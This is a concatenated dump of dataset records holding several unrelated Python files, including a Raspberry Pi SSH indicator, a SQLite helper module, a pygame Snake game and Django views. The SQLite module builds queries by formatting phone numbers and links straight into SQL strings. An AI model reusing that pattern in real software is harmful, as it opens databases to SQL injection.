suffixes=('', BY_LINK)\n )\n group_df.insert(\n len(group_df.axes[1]),\n QUOTA_BY_AVAILABLE,\n (group_df[QUOTA_RSV] / group_df[QUOTA_RSV + BY_LINK]) * group_df[\n QUOTA_RSV + BY_LINK\n ].where(\n group_df[QUOTA_RSV + BY_LINK] < group_df[AVAILABLE],\n other=group_df[AVAILABLE]\n )\n )\n group_df.loc[group_df[QUOTA_BY_AVAILABLE].isnull(), QUOTA_BY_AVAILABLE] = 0\n group_df.drop(QUOTA_RSV + BY_LINK, axis=1, inplace=True)\n group_df[SOFT_HARD_RSV] = group_df[SOFT_RSV_LOC] + group_df[HARD_RSV_LOC]\n group_df[TOTAL_RSV] = (\n group_df[SOFT_HARD_RSV] + group_df[QUOTA_BY_AVAILABLE]\n )\n\n group_df = group_df.rename(columns={\n WHS_LOC: WHS,\n EAN_LOC: EAN,\n PRODUCT_NAME: PRODUCT,\n SOFT_RSV_LOC: SOFT_RSV,\n HARD_RSV_LOC: HARD_RSV,\n QUOTA_RSV: QUOTA,\n AVAILABLE: AVAILABLE_REST,\n EXPECTED_DATE_LOC: DATE_RSV\n })\n return group_df.round()\n\n\ndef merge_period_rsv(df):\n rsv_current = get_data(TABLE_RESERVE_CURRENT).rename(columns={\n SOFT_HARD_RSV: SOFT_HARD_RSV_CURRENT\n })[[LINK_HOLDING, SOFT_HARD_RSV_CURRENT]]\n rsv_future = get_data(TABLE_RESERVE_FUTURE).rename(columns={\n SOFT_HARD_RSV: SOFT_HARD_RSV_FUTURE\n })[[LINK_HOLDING, SOFT_HARD_RSV_FUTURE]]\n df = df.merge(rsv_current, on=LINK_HOLDING, how='left')\n df = df.merge(rsv_future, on=LINK_HOLDING, how='left')\n df = utils.void_to(df, SOFT_HARD_RSV_CURRENT, 0)\n df = utils.void_to(df, SOFT_HARD_RSV_FUTURE, 0)\n return df\n\n\ndef main():\n if os.environ.get('SRS_DOWNLOAD') is None:\n from update_data import update_reserve\n update_reserve(SOURCE_FILE)\n df = get_reserve()\n df_by_date = reserve_by_date(df)\n save_to_excel(RESULT_DIR + TABLE_RSV_BY_DATE, df_by_date)\n df_current = table_processing(df, CURRENT)\n save_to_excel(RESULT_DIR + TABLE_RESERVE_CURRENT, df_current)\n df_future = table_processing(df, FUTURE)\n save_to_excel(RESULT_DIR + TABLE_RESERVE_FUTURE, df_future)\n df = merge_period_rsv(table_processing(df))\n save_to_excel(RESULT_DIR + TABLE_RESERVE, df)\n print_complete(__file__)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AlexeyAnanchenko/pandas_work_scripts","sub_path":"scripts/base_scripts/reserve.py","file_name":"reserve.py","file_ext":"py","file_size_in_byte":6879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73890405831","text":"import RPi.GPIO as GPIO\nimport time \nimport os\nimport subprocess\n#from subprocess import run\n#import sys\n\nbuttonPin = 21\nblueLED = 16\nyellowLED = 12\nflag = 0\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\nGPIO.setup(buttonPin, GPIO.IN, pull_up_down=GPIO.PUD_UP)\nGPIO.setup(blueLED, GPIO.OUT)\nGPIO.setup(yellowLED, GPIO.OUT)\n\nlast_state = True\ninput_state = True\npress_start = time.clock()\n\nprint(\" SSH INDICATION ACTIVE\")\nGPIO.output(blueLED, GPIO.HIGH)\n'''\nk = 0\nwhile k<100:\n print(time.clock())\n time.sleep(0.1)\n k+=1\n'''\nwhile True:\n input_state = GPIO.input(buttonPin)\n \n if(input_state):\n last_state = True\n\n if (not input_state):\n \n if(last_state == False):\n while flag < 20 and not input_state:\n GPIO.output(blueLED, GPIO.LOW)\n time.sleep(0.1)\n GPIO.output(blueLED, GPIO.HIGH)\n time.sleep(0.1)\n flag += 1\n input_state = GPIO.input(buttonPin)\n if flag > 19:\n print(\" SHUTDOWN\")\n flag = 0\n os.system('sudo shutdown -h now')\n\n print(\"BUTTON PRESSED\")\n # GPIO.output(yellowLED, GPIO.LOW)\n # GPIO.output(blueLED, GPIO.LOW)\n # time.sleep(3)\n last_state = False\n \n try:\n output2 = subprocess.check_output('last | grep \\'still logged in\\'', shell=True)\n except:\n #print(\"error\")\n GPIO.output(yellowLED, GPIO.LOW)\n else:\n #print(\"ssh active\")\n #print(output2)\n GPIO.output(yellowLED, GPIO.HIGH)\n \n #GPIO.output(blueLED, GPIO.HIGH)\n #GPIO.output(yellowLED, GPIO.HIGH)\n #GPIO.output(blueLED, GPIO.LOW)\n #GPIO.output(yellowLED, GPIO.LOW)\n time.sleep(1)\n GPIO.output(blueLED, GPIO.HIGH)\n\nGPIO.cleanup()\n","repo_name":"blusky-cloud/Raspi-Code","sub_path":"rpzwh_1_dcm/pythons/startup_scripts/ssh_indicator.py","file_name":"ssh_indicator.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"16999786586","text":"import sqlite3\n\npath_database = \"base.db\"\n\nconnect = sqlite3.connect(path_database, check_same_thread=False)\ncursor = connect.cursor()\n\nview_data = (\n 'Number',\n 'Name',\n 'Link',\n 'Price',\n 'Profile',\n 'Information',\n 'Address')\n\nview_data_telegram = (\n 'Number',\n 'Name',\n 'Seen',\n 'Profile',\n 'Processed')\n\n\n# Common\ndef _exe_raw_sql(sql):\n try:\n cursor.execute(sql)\n fetchall = cursor.fetchall()\n except sqlite3.DatabaseError as err:\n raise err\n else:\n connect.commit()\n return fetchall\n\n\n# People\ndef create_bd():\n sql = \"\"\"\n CREATE TABLE if not exists people(\n Id INTEGER PRIMARY KEY UNIQUE,\n Number VARCHAR(255) NOT NULL,\n Name VARCHAR(255) NOT NULL,\n Link VARCHAR(255),\n Price VARCHAR(255),\n Profile VARCHAR(255),\n Information VARCHAR(255),\n Address VARCHAR(255),\n CONSTRAINT unique_local UNIQUE (Number)\n );\n \"\"\"\n _exe_raw_sql(sql)\n\n\ndef insert_into_table(*args, table='people'):\n if table == 'people':\n colons = view_data\n elif table == 'telegram':\n colons = view_data_telegram\n data = dict(zip(colons, args))\n\n cols = ', '.join(\"'{}'\".format(col) for col in data.keys())\n vals = ', '.join(':{}'.format(col) for col in data.keys())\n sql = 'INSERT INTO {} ({}) VALUES ({})'.format(table, cols, vals)\n try:\n cursor.execute(sql, data)\n except sqlite3.DatabaseError as err:\n raise err\n connect.commit()\n\n\ndef get_all():\n sql = \"SELECT * FROM people;\"\n return _exe_raw_sql(sql)\n\n\n# Filters People\ndef filter_by_links(links):\n \"\"\"links should be set, Return Set of links for processing\"\"\"\n\n assert isinstance(links, set)\n\n sql = \"SELECT Link FROM people WHERE Link in ({});\".format(\n ', '.join([\"'{}'\".format(item) for item in links]))\n resp = _exe_raw_sql(sql)\n return set(links) - set([item[0] for item in resp])\n\n\ndef is_not_phone_exists(phone):\n \"\"\"Return True or False\"\"\"\n\n sql = \"SELECT Number FROM people WHERE Number is '{}';\".format(phone)\n resp = _exe_raw_sql(sql)\n return not any(resp)\n\n\ndef number_exists(number):\n \"\"\"Return True or False\"\"\"\n return _exe_raw_sql(\"SELECT Link FROM people WHERE Link is '{}';\"\n .format(number))\n\n\ndef link_exists(link):\n \"\"\"Return True or False\"\"\"\n return _exe_raw_sql(\"SELECT Link FROM people WHERE Link is '{}';\"\n .format(link))\n\n\n# Telegram\ndef create_bd_telegram():\n sql = \"\"\"\n CREATE TABLE if not exists telegram(\n Number VARCHAR(20) NOT NULL,\n Name VARCHAR(100) NOT NULL,\n Seen VARCHAR(30),\n Profile VARCHAR(255),\n Processed INTEGER,\n CONSTRAINT unique_local UNIQUE (Number)\n );\n \"\"\"\n _exe_raw_sql(sql)\n\n\ndef is_telegram_acount(phone):\n \"\"\"Return True or False\"\"\"\n\n sql = \"SELECT Number FROM telegram WHERE Number is '{}';\".format(phone)\n resp = _exe_raw_sql(sql)\n return any(resp)\n\n\ndef get_all_from_telegram():\n sql = \"SELECT * FROM telegram;\"\n return _exe_raw_sql(sql)\n\n\ndef get_user_from_telegram(phone):\n sql = \"SELECT Name, Seen, Profile, Processed \" \\\n \"FROM telegram WHERE Number is '{}';\".format(phone)\n return _exe_raw_sql(sql)\n\n\ndef get_unprocessed_users():\n sql = \"SELECT Number FROM telegram \" \\\n \"WHERE Name IS NOT 'Not found' AND Processed IS NULL;\"\n return [item[0] for item in _exe_raw_sql(sql)]\n\n\ndef set_user_processed(phone):\n sql = \"UPDATE telegram SET Processed=1 WHERE Number = '{}'\".format(phone)\n return [item[0] for item in _exe_raw_sql(sql)]\n","repo_name":"stasya72008/a-ron-don-don","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"38906729454","text":"\"\"\"\n 将问题,答案,实体,关系等\n 映射成 word 级别的字典,原子级别,\n 每一种类型(word级别和实体关系级别的,都有一个索引id对应\n 比如,\"Joseph Tom\" 作为一个实体,有一个id索引对应,\"Joseph\" 和 \"Tom\" 单个单词各自有一个索引对应\n\"\"\"\nfrom collections import defaultdict\nimport random\nimport csv\nfrom word_process_method import *\nfrom tqdm import tqdm\nwords = set([]) #单词级别\nentities = set([])\nrelations = set([])\nall = set([])\ntop_k = 0 #记录答案的最多数目\ndef add_entity(entity):\n entities.add(entity)\n for w in entity.split(\" \"):\n words.add(clean_word(w))\ndef add_sentence(sentence):\n for w in sentence.split(\" \"):\n words.add(clean_word(w))\ndef read_kb_file( kb_path):\n with open(kb_path,'r',encoding='utf-8') as kb_file:\n print(\"reading kb_file...\")\n reader = csv.DictReader(kb_file,delimiter=\"|\",fieldnames=['subject','relation','object'])\n for row in tqdm(reader):\n e1,r,e2 = row['subject'],row['relation'],row['object']\n add_entity(e1)\n add_entity(e2)\n relations.add(r)\n relations.add(\"!_\"+r)#将三元组的逆关系和加入进去\ndef read_doc_file(doc_path):\n with open(doc_path,'r',encoding='utf-8') as doc_file:\n print(\"reading doc file...\")\n reader = csv.DictReader(doc_file,delimiter=\"|\",fieldnames=['e','r','desc'])\n for row in tqdm(reader):\n ent,rel,desc = row['e'],row['r'],row['desc']\n add_entity(ent)\n relations.add(rel)\n relations.add(\"!_\"+rel)\n add_sentence(desc)\ndef read_qa_file(qa_path):\n global top_k\n with open(qa_path,'r',encoding='utf-8') as qa_file:\n print(\"reading qa file ...\")\n reader = csv.DictReader(qa_file,delimiter='\\t',fieldnames=['q','a'])\n for row in tqdm(reader):\n q,a = row['q'],row['a']\n add_sentence(q)\n aa=a.split(\"|\")\n top_k = max(top_k,len(aa))\n for e in aa:\n add_entity(e)\ndef write_idx(idx_path,s,write_num=None):\n print(\"writing \",idx_path,\" ...\")\n #添加问题编号\n if write_num:\n for i in range(0,top_k):\n qa_num = \"@{no}\".format(no=i)\n s.add(qa_num)\n ordered_set = sorted(s) # 排序\n id=1\n with open(idx_path,'w',newline='',encoding='utf-8') as idx_file:\n writer = csv.DictWriter(idx_file,delimiter='\\t',fieldnames=['x','count'])\n for x in ordered_set :\n writer.writerow({'x':x,'count':id})\n id = id+1\nif __name__ == \"__main__\":\n dataset = \"wiki\"\n path = \"../data/movieqa/\"\n tran_path = path+\"clean_{name}_qa_train.txt\".format(name=dataset)\n test_path = path+\"clean_{name}_qa_test.txt\".format(name=dataset)\n dev_path = path+\"clean_{name}_qa_dev.txt\".format(name=dataset)\n kb_path = path+\"clean_wiki_kb.txt\" #.format(name=dataset)\n doc_path = path+\"clean_wiki_doc.txt\"\n read_doc_file(doc_path)\n read_kb_file(kb_path)\n read_qa_file(tran_path)\n read_qa_file(test_path)\n read_qa_file(dev_path)\n write_idx(path + \"{name}_word_idx.txt\".format(name=dataset),words)\n write_idx(path + \"{name}_entity_idx.txt\".format(name=dataset), entities)\n write_idx(path + \"{name}_relation_idx.txt\".format(name=dataset), relations)\n all = all.union(words,entities,relations)\n write_idx(path + \"{name}_idx.txt\".format(name=dataset), all,write_num=True)","repo_name":"Joseph1314/MyKBQA","sub_path":"Code_KV/get_dictionary.py","file_name":"get_dictionary.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"27"} +{"seq_id":"33560696167","text":"import random, pygame, sys\r\nfrom pygame.locals import *\r\n\r\nFPS = 15\r\nWINDOWIDTH = 640\r\nWINDOWHEIGHT = 480\r\nCELLSIZE = 20\r\nassert WINDOWIDTH % CELLSIZE == 0, \"Window must be a multiple cell size\"\r\nassert WINDOWHEIGHT % CELLSIZE == 0, \"Window must be a multiple cell size\"\r\nCELLWIDTH = int(WINDOWIDTH / CELLSIZE)\r\nCELLHEIGHT = int(WINDOWHEIGHT / CELLSIZE)\r\n\r\n#RGB\r\n\r\nWHITE = (255, 255, 255)\r\nBLACK = (0, 0, 0)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nDARKG = (0, 155, 0)\r\nDARKGRAY = (40, 40, 40)\r\nBGCOLOR = BLACK\r\n\r\nUP = 'up'\r\nDOWN = 'down'\r\nLEFT = 'left'\r\nRIGHT = 'right'\r\n\r\nHEAD = 0 #head of the snake\r\n\r\ndef rtrn_func():\r\n return\r\n\r\ndef main():\r\n\r\n global FPSCLOCK, DISPLAYSURF, BASICFONT\r\n\r\n pygame.init()\r\n \r\n FPSCLOCK = pygame.time.Clock()\r\n DISPLAYSURF = pygame.display.set_mode((WINDOWIDTH, WINDOWHEIGHT))\r\n BASICFONT = pygame.font.Font('freesansbold.ttf', 18)\r\n pygame.display.set_caption('Snake do Paraguai')\r\n\r\n showStartScreen()\r\n\r\n \r\n #while True:\r\n\r\n runGame()\r\n showGameOverScreen()\r\n\r\ndef runGame():\r\n\r\n #set random start point\r\n startx = random.randint(5, CELLWIDTH - 6)\r\n starty = random.randint(5, CELLHEIGHT - 6)\r\n snakeCoords = [{'x': startx, 'y': starty},\r\n {'x': startx -1, 'y': starty},\r\n {'x': startx -2, 'y': starty}]\r\n direction = RIGHT\r\n\r\n #Start apple in random loation\r\n apple = getRandomLocation()\r\n\r\n while True: #main game Loop\r\n for event in pygame.event.get():\r\n print(event)\r\n if event.type == QUIT:\r\n terminate()\r\n elif event.type == KEYDOWN:\r\n if(event.key == K_LEFT or event.key == K_a) and direction != RIGHT:\r\n direction = LEFT\r\n elif(event.key == K_RIGHT or event.key == K_d) and direction != LEFT:\r\n direction = RIGHT\r\n elif(event.key == K_UP or event.key == K_w) and direction != DOWN:\r\n direction = UP\r\n elif(event.key == K_DOWN or event.key == K_s) and direction != UP:\r\n direction = DOWN\r\n elif event.key == K_ESCAPE:\r\n terminate()\r\n print(\"Cabeça: \", snakeCoords[HEAD]['x'], snakeCoords[HEAD]['y'])\r\n\r\n\r\n #check if the snake has hit itself or the edge\r\n if snakeCoords[HEAD]['x'] == 0 or snakeCoords[HEAD]['x'] == CELLWIDTH or snakeCoords[HEAD]['y'] == 0 or snakeCoords[HEAD]['y'] == CELLHEIGHT:\r\n print(\"GAME-OVER BATEU NA BORDA\")\r\n return\r\n\r\n #rtrn_func() #game over\r\n for snakeBody in snakeCoords[1:]:\r\n if snakeBody['x'] == snakeCoords[HEAD]['x'] and snakeBody == snakeCoords[HEAD]['y']:\r\n print(\"GAME-OVER SE COMEU\")\r\n return\r\n #rtrn_func() #game over\r\n\r\n # check if snake has eaten an apple\r\n if snakeCoords[HEAD]['x'] == apple['x'] and snakeCoords[HEAD]['y'] == apple['y']:\r\n apple = getRandomLocation()\r\n else:\r\n del snakeCoords[-1]\r\n\r\n #Move the fucking snake\r\n if direction == UP:\r\n newhead = {'x': snakeCoords[HEAD]['x'], 'y': snakeCoords[HEAD]['y'] -1}\r\n elif direction == DOWN:\r\n newhead = {'x': snakeCoords[HEAD]['x'], 'y': snakeCoords[HEAD]['y'] +1}\r\n elif direction == LEFT:\r\n newhead = {'x': snakeCoords[HEAD]['x'] -1, 'y': snakeCoords[HEAD]['y']}\r\n elif direction == RIGHT:\r\n newhead = {'x': snakeCoords[HEAD]['x'] +1, 'y': snakeCoords[HEAD]['y']}\r\n snakeCoords.insert(0, newhead)\r\n\r\n DISPLAYSURF.fill(BGCOLOR)\r\n drawGrid()\r\n drawSnake(snakeCoords)\r\n drawApple(apple)\r\n drawScore(len(snakeCoords)-3)\r\n pygame.display.update()\r\n FPSCLOCK.tick(FPS)\r\n\r\n\r\n\r\ndef drawPressKeyMsg():\r\n pressKeySurf = BASICFONT.render('Press a key to play.', True, DARKGRAY)\r\n pressKeyRect = pressKeySurf.get_rect()\r\n pressKeyRect.topleft = (WINDOWIDTH - 200, WINDOWHEIGHT - 30)\r\n DISPLAYSURF.blit(pressKeySurf, pressKeyRect)\r\n \r\ndef checkForKeyPress():\r\n if len(pygame.event.get(QUIT)) > 0:\r\n terminate()\r\n\r\n KeyUpEvents = pygame.event.get(KEYUP)\r\n\r\n if len(KeyUpEvents) == 0:\r\n return None\r\n\r\n if KeyUpEvents[0].key == K_ESCAPE:\r\n terminate()\r\n return KeyUpEvents[0].key\r\n\r\ndef showStartScreen():\r\n titleFont = pygame.font.Font('freesansbold.ttf', 50)\r\n titleSurf1 = titleFont.render('Snake do Paraguai', True, WHITE, DARKG)\r\n titleSurf2 = titleFont.render('Snake do Paraguai', True, GREEN)\r\n\r\n degrees1 = 0\r\n degrees2 = 0\r\n while True:\r\n DISPLAYSURF.fill(BGCOLOR)\r\n\r\n rotatedSurf1 = pygame.transform.rotate(titleSurf1, degrees1)\r\n rotatedRect1 = rotatedSurf1.get_rect()\r\n rotatedRect1.center = (WINDOWIDTH / 2, WINDOWHEIGHT / 2)\r\n DISPLAYSURF.blit(rotatedSurf1, rotatedRect1)\r\n\r\n rotatedSurf2 = pygame.transform.rotate(titleSurf2, degrees2)\r\n rotatedRect2 = rotatedSurf2.get_rect()\r\n rotatedRect2.center = (WINDOWIDTH / 2, WINDOWHEIGHT / 2)\r\n DISPLAYSURF.blit(rotatedSurf2, rotatedRect2)\r\n\r\n drawPressKeyMsg()\r\n\r\n if checkForKeyPress():\r\n pygame.event.get()\r\n return\r\n pygame.display.update()\r\n FPSCLOCK.tick(FPS)\r\n\r\ndef terminate():\r\n pygame.quit()\r\n sys.exit()\r\n\r\ndef getRandomLocation():\r\n return{'x': random.randint(0, CELLWIDTH - 1), 'y': random.randint(0, CELLHEIGHT -1)}\r\n\r\ndef showGameOverScreen():\r\n gameOverFont = pygame.font.Font('freesansbold.ttf', 150)\r\n gameSurf = gameOverFont.render('Game', True, WHITE)\r\n overSurf = gameOverFont.render('Over', True, WHITE)\r\n gameRect = gameSurf.get_rect()\r\n overRect = overSurf.get_rect()\r\n gameRect.midtop = (WINDOWIDTH /2, 10)\r\n overRect.midtop = (WINDOWIDTH / 2,gameRect.height + 10 + 25)\r\n\r\n DISPLAYSURF.blit(gameSurf, gameRect)\r\n DISPLAYSURF.blit(overSurf, overRect)\r\n drawPressKeyMsg()\r\n pygame.display.update()\r\n\r\n pygame.time.wait(500)\r\n checkForKeyPress()\r\n\r\n while True:\r\n if checkForKeyPress():\r\n pygame.event.get()\r\n return\r\n\r\ndef drawScore(score):\r\n scoreSurf = BASICFONT.render('Score: %s' % (score), True, WHITE)\r\n scoreRect = scoreSurf.get_rect()\r\n scoreRect.topleft = (WINDOWIDTH - 120, 10)\r\n DISPLAYSURF.blit(scoreSurf, scoreRect)\r\n\r\ndef drawSnake(snakeCoords):\r\n for coord in snakeCoords:\r\n x = coord['x'] * CELLSIZE\r\n y = coord['y'] * CELLSIZE\r\n snakeSegmentRect = pygame.Rect(x, y, CELLSIZE, CELLSIZE)\r\n pygame.draw.rect(DISPLAYSURF, DARKG, snakeSegmentRect)\r\n wormInnerSegmentRect = pygame.Rect(x + 4, y + 4, CELLSIZE - 8, CELLSIZE - 8)\r\n pygame.draw.rect(DISPLAYSURF, GREEN, wormInnerSegmentRect)\r\n\r\ndef drawApple(coord):\r\n x = coord['x'] * CELLSIZE\r\n y = coord['y'] * CELLSIZE\r\n appleRect = pygame.Rect(x, y, CELLSIZE, CELLSIZE)\r\n pygame.draw.rect(DISPLAYSURF, RED, appleRect)\r\n\r\ndef drawGrid():\r\n for x in range(0, WINDOWIDTH, CELLSIZE):\r\n pygame.draw.line(DISPLAYSURF, DARKGRAY, (x, 0), (x, WINDOWHEIGHT))\r\n for y in range(0, WINDOWHEIGHT, CELLSIZE):\r\n pygame.draw.line(DISPLAYSURF, DARKGRAY, (0, y), (WINDOWIDTH, y))\r\n \r\nif __name__ == '__main__':\r\n main()","repo_name":"pyString/Fake-Snake","sub_path":"Teste2PyGame.py","file_name":"Teste2PyGame.py","file_ext":"py","file_size_in_byte":7617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"25772115818","text":"import pickle\n\nimport numpy as np\n\nfrom FinalDataset.DayFive.StepSix import StringToInt\n\n\ndef predict(symptoms_list):\n mkm = pickle.load(open('./FinalDataset/MiniBatchKMeansModel.pkl',\n 'rb'))\n symptoms_model = pickle.load(open('./FinalDataset/Symptoms.pkl',\n 'rb'))\n data = pickle.load(open('./FinalDataset/TrainingPreProcessedData.pkl', 'rb'))\n\n dis = pickle.load(open('./FinalDataset/ValueDiseaseDictionary.pkl', 'rb'))\n\n mkmdict = pickle.load(open('./FinalDataset/MiniBatchDictionary.pkl',\n 'rb'))\n\n conv = []\n for symptom in symptoms_model:\n if symptom in symptoms_list:\n conv.append(1)\n else:\n conv.append(0)\n conv = np.array(conv)\n data_x = conv.tolist()[:int(1909 / 2)]\n data_y = conv.tolist()[int(1909 / 2):1909]\n\n b = StringToInt.Binary()\n x_value = int(b._ToNumber(\"\".join(str(x) for x in data_x)))\n y_value = int(b._ToNumber(\"\".join(str(y) for y in data_y)))\n\n st = '(' + str(x_value) + ', ' + str(y_value) + ')'\n\n temp = {}\n if st in dis.keys():\n print(dis[st])\n else:\n vals = mkmdict[int(str(mkm.predict([[x_value, y_value]])).replace('[', '').replace(']', ''))]\n for val in vals:\n # euclidean_distance.append(((val[0] - x_value) ** 2 + (val[1] - y_value) ** 2)**0.5)\n temp[((val[0] - x_value) ** 2 + (val[1] - y_value) ** 2) ** 0.5] = [val[0], val[1]]\n\n predicted_diseases = []\n\n for i in range(5):\n value = temp[sorted(list(temp.keys()))[i]]\n # print(dis['('+str(value[0])+', '+str(value[1])+')'])\n # print(dis[(542, 636)])\n predicted_diseases.extend(dis[tuple(value)])\n\n return predicted_diseases\n","repo_name":"SharobSinha97/MedicalChatbot","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71138615753","text":"import unittest\nfrom copy import deepcopy\nfrom common.read_yml import ReadYaml\nimport time\nfrom common.logs_create import info_log, log_class_methods\nfrom business_common.request_demo import RequestsDemo\nfrom common.resCheck import ResCheck\nfrom parameterized import parameterized\nfrom business_common.clean_Usernote import ClearNotes\n\n\n@log_class_methods\nclass NotesvrSetnoteInfolevel2(unittest.TestCase):\n env_config = ReadYaml.env_yaml(\"config.yml\")\n host = env_config[\"host\"]\n sid = env_config[\"sid\"]\n userid = env_config[\"userid\"]\n path = \"/v3/notesvr/set/noteinfo\"\n url = host + path\n api_data_base = {\"noteId\": str(int(time.time() * 1000)),\n \"star\": 1,\n \"remindTime\": int(time.time()),\n \"remindType\": \"1\",\n \"groupId\": \"groupId\"}\n star_num = ([{\"star\": 1, \"code\": 200}], [{\"star\": 0, \"code\": 200}])\n\n remindType_num = ([{\"remindType\": 0, \"code\": 200}],\n [{\"remindType\": 1, \"code\": 200}],\n [{\"remindType\": 2, \"code\": 200}])\n\n def setUp(self) -> None:\n \"\"\"清空该用户所有便签\"\"\"\n info_log(\"清空该用户所有便签\")\n res = ClearNotes().clean_Usernote(self.userid, self.sid)\n self.assertEqual(True, res, msg=\"clear notes error!\")\n\n @parameterized.expand(star_num)\n def testCase02(self, star_num):\n \"\"\"上传/更新便签信息star枚举值校验\"\"\"\n info_log(\"用户上传/更新便签信息star枚举值\")\n data = deepcopy(self.api_data_base)\n data[\"star\"] = star_num[\"star\"]\n res = RequestsDemo().post(url=self.url, userid=self.userid, sid=self.sid, data=self.api_data_base)\n expect_res = {\"responseTime\": int, \"infoVersion\": int, \"infoUpdateTime\": int}\n self.assertEqual(200, res.status_code)\n ResCheck().res_check(expect_res, res.json())\n\n @parameterized.expand(remindType_num)\n def testCase03(self, remindType_num):\n \"\"\"上传/更新便签信息remindType枚举值校验\"\"\"\n info_log(\"用户上传/更新便签信息remindType枚举值\")\n data = deepcopy(self.api_data_base)\n data[\"remindType\"] = remindType_num\n res = RequestsDemo().post(url=self.url, userid=self.userid, sid=self.sid, data=self.api_data_base)\n expect_res = {\"responseTime\": int, \"infoVersion\": int, \"infoUpdateTime\": int}\n self.assertEqual(200, res.status_code)\n ResCheck().res_check(expect_res, res.json())\n","repo_name":"zhaosudi/Note","sub_path":"TestCase/note/NotesvrSetnoteInfo/test_level2.py","file_name":"test_level2.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14975795519","text":"#Consider an equation of form, Ax + B = Cx + D\ndef elemR(input_array, x):\n i=0 #loop counter\n length = len(input_array)\n while(i'\n return xml\n\n def set_xml(self, arquivo):\n if self._le_xml(arquivo):\n self.versao.xml = arquivo\n self.tpAmb.xml = arquivo\n self.cUF.xml = arquivo\n self.xServ.xml = arquivo\n\n xml = property(get_xml, set_xml)\n \n\nclass RetConsStatServ(XMLNFe):\n def __init__(self):\n super(RetConsStatServ, self).__init__()\n self.versao = TagDecimal(nome=u'retConsStatServ', codigo=u'FR01', propriedade=u'versao', namespace=NAMESPACE_NFE, valor=u'1.07', raiz=u'/')\n self.tpAmb = TagInteiro(nome=u'tpAmb' , codigo=u'FR03', tamanho=[1, 1, 1], raiz=u'//retConsStatServ', valor=2)\n self.verAplic = TagCaracter(nome=u'verAplic' , codigo=u'FR04', tamanho=[1, 20] , raiz=u'//retConsStatServ')\n self.cStat = TagCaracter(nome=u'cStat' , codigo=u'FR05', tamanho=[3, 3, 3], raiz=u'//retConsStatServ')\n self.xMotivo = TagCaracter(nome=u'xMotivo' , codigo=u'FR06', tamanho=[1, 255] , raiz=u'//retConsStatServ')\n self.cUF = TagInteiro(nome=u'cUF' , codigo=u'FR07', tamanho=[2, 2, 2], raiz=u'//retConsStatServ')\n self.dhRecbto = TagDataHora(nome=u'dhRecbto' , codigo=u'FR08', raiz=u'//retConsStatServ')\n self.tMed = TagInteiro(nome=u'tMed' , codigo=u'FR09', tamanho=[1, 4] , raiz=u'//retConsStatServ', obrigatorio=False)\n self.dhRetorno = TagDataHora(nome=u'dhRetorno' , codigo=u'FR10', raiz=u'//retConsStatServ', obrigatorio=False)\n self.xObs = TagCaracter(nome=u'xObs' , codigo=u'FR11', tamanho=[1, 255] , raiz=u'//retConsStatServ', obrigatorio=False)\n self.caminho_esquema = os.path.join(DIRNAME, u'schema', ESQUEMA_ATUAL + u'/')\n self.arquivo_esquema = u'retConsStatServ_v1.07.xsd'\n\n def get_xml(self):\n xml = XMLNFe.get_xml(self)\n xml += ABERTURA\n xml += self.versao.xml\n xml += self.tpAmb.xml\n xml += self.verAplic.xml\n xml += self.cStat.xml\n xml += self.xMotivo.xml\n xml += self.cUF.xml\n xml += self.dhRecbto.xml\n xml += self.tMed.xml\n xml += self.dhRetorno.xml\n xml += self.xObs.xml\n xml += u''\n return xml\n\n def set_xml(self, arquivo):\n if self._le_xml(arquivo):\n self.versao.xml = arquivo\n self.tpAmb.xml = arquivo\n self.verAplic.xml = arquivo\n self.cStat.xml = arquivo\n self.xMotivo.xml = arquivo\n self.cUF.xml = arquivo\n self.dhRecbto.xml = arquivo\n self.tMed.xml = arquivo\n self.dhRetorno.xml = arquivo\n self.xObs.xml = arquivo\n\n xml = property(get_xml, set_xml)\n","repo_name":"marcydoty/Recursos-NFE-em-Python","sub_path":"nfe/pysped/nfe/manual_300/consstatserv_107.py","file_name":"consstatserv_107.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"pt","doc_type":"code","stars":68,"dataset":"github-code","pt":"27"} +{"seq_id":"173064456","text":"from django.shortcuts import (\n\n render,\n get_object_or_404,\n redirect)\nfrom django.urls import reverse\nfrom .models import Enquiry\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import EnquiryForm\n\n\ndef all_enquiries(request):\n \"\"\" A view to return all enquiries \"\"\"\n if request.user.is_superuser:\n enquiries = Enquiry.objects.all().filter\n else:\n enquiries = Enquiry.objects.all().filter(status=1)\n\n context = {\n 'enquiries': enquiries,\n 'on_page': True,\n }\n\n return render(request, 'enquiry/enquiries.html', context)\n\n\n@login_required\ndef add_enquiry(request):\n \"\"\" Add a new enquiry \"\"\"\n if not request.user.is_superuser:\n messages.error(\n request,\n 'Sorry, only store owner can add new enquiries.'\n )\n return redirect(reverse('home'))\n\n enquiries = Enquiry.objects.all()\n\n if request.method == 'POST':\n form = EnquiryForm(request.POST)\n\n if form.is_valid():\n form.save()\n messages.success(request, \"Enquiry was added successfully.\")\n return redirect(reverse('enquiries'))\n else:\n messages.error(request,\n 'Enquiry was not added. Correct the form inputs.'\n )\n else:\n form = EnquiryForm()\n\n template = 'enquiry/add_enquiry.html'\n context = {\n 'form': form,\n 'enquiries': enquiries,\n 'on_page': True,\n }\n\n return render(request, template, context)\n\n\n@login_required\ndef edit_enquiry(request, enquiry_id):\n \"\"\" Edit an enquiry \"\"\"\n if not 